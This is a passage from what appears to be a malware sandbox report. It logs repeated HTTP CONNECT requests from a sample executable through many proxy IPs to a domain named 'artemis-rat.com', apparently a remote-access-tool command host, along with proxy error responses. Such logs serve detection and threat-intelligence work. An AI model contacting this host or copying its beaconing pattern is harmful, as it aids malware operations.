                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.724111080 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1957192.168.2.555230103.213.97.74803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290607929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.605576992 CET334INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 204
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1958192.168.2.555220103.166.39.1736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290750027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1959192.168.2.555357198.12.255.193485723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290765047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1960192.168.2.55526554.178.159.199180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.290832043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.557030916 CET503INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 324
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1961192.168.2.555258211.222.252.18781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.294595003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1962192.168.2.55528113.40.239.13031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.296787024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.587786913 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1963192.168.2.555232123.30.154.17177773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.300721884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.666925907 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.10.3 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1964192.168.2.555413202.159.30.1294433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.300721884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1965192.168.2.555257185.132.242.21280833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.304250002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1966192.168.2.555414202.159.30.1294433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.304627895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1967192.168.2.555416202.159.30.1294433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.308069944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1968192.168.2.55541914.163.45.724433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.314160109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1969192.168.2.55542314.163.45.724433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.316241980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1970192.168.2.55542514.163.45.724433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.317102909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1971192.168.2.55542693.190.24.1194433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.317184925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1972192.168.2.55542814.163.45.724433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.318222046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1973192.168.2.55542793.190.24.1194433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.318222046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1974192.168.2.55542993.190.24.1194433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.319251060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1975192.168.2.55543093.190.24.1194433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.320334911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1976192.168.2.55513551.79.87.14485333876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.340404034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905214071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.595448017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092767954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.889461040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592714071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.904928923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1977192.168.2.555293152.228.140.225517833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.340405941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092780113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.208009958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.405150890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.405215025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.498951912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.595184088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1978192.168.2.555223116.199.168.141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.342180014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1979192.168.2.55532561.129.2.21280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.400834084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.727495909 CET726INHTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                                                            Server: nginx/1.20.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:28:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: close
